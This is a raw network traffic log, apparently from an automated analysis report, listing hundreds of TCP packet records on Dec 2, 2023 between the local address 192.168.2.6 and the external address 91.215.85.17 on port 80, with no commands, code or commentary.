                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748132944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748140097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748151064 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748162985 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748191118 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748212099 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748223066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748272896 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748286009 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748322010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748342037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748354912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748366117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748385906 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748406887 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748511076 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748524904 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748534918 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748547077 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748557091 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748564005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748577118 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748596907 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748601913 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748610973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748661041 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748692989 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748801947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748814106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748825073 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748842001 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748852015 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748868942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748945951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748956919 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748967886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748980999 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748985052 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.748991013 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749022007 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749038935 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749051094 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749053955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749068022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749079943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749090910 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749102116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749111891 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749114037 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749126911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749134064 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749134064 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749149084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749159098 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749166012 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749171019 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749182940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749218941 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749219894 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749310970 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749322891 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749334097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749357939 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749372005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749381065 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749385118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749433994 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749484062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749519110 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749531031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749543905 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749560118 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749577045 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749579906 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749589920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749603987 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749614954 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749638081 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749644995 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749656916 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749663115 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749696016 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749778986 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749793053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749804020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749815941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749830008 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749851942 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749876022 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749887943 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749898911 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749910116 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749921083 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749938011 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749946117 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749958038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749972105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749985933 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.749995947 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750020981 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750103951 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750118017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750128984 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750142097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750164986 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750169992 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750169992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750183105 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750205994 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750224113 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750247955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750260115 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750272036 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750288010 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750323057 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750344038 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750356913 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750392914 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750401020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750444889 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750458956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750469923 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750480890 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750483990 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750507116 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750587940 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750601053 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750612020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750622988 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750629902 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750637054 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750653982 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750678062 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750678062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750725031 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750737906 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750766993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750780106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750792980 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750803947 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750818968 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750843048 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750874043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750888109 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750901937 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750917912 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750929117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750931025 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750952005 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750956059 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.750997066 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751019001 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751032114 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751072884 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751101017 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751112938 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751122952 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751137972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751142025 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751173973 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751184940 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751187086 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751220942 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751241922 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751254082 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751292944 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751300097 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751315117 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751349926 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751364946 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751377106 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751409054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751410961 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751466990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751483917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751494884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751512051 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751524925 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751529932 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751555920 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751568079 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751578093 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751643896 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751653910 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751677990 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751691103 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751725912 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751729965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751740932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751751900 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751775980 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751806021 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751817942 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751844883 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751863956 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751902103 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751923084 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751935959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751945972 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751957893 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751962900 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.751966953 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752022982 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752027035 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752038002 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752048969 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752068043 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752089977 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752113104 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752127886 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752137899 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752150059 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752170086 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752180099 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752244949 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752258062 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752269030 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752279997 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752305984 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752320051 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752326965 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752340078 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752370119 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752392054 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752398968 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752435923 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752465963 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752477884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752500057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752506018 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752512932 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752537966 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752557993 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752578974 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752590895 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752604008 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752615929 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752641916 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752707958 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752720118 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752732992 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752743959 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752751112 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752785921 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752840996 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752852917 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752863884 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752876043 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752886057 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752887964 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752909899 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752964020 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752975941 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.752986908 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753001928 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753021955 CET804972091.215.85.17192.168.2.6
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753022909 CET4972080192.168.2.691.215.85.17
                                                                                                                                                                                                                                                                                                                Dec 2, 2023 02:06:46.753045082 CET804972091.215.85.17192.168.2.6
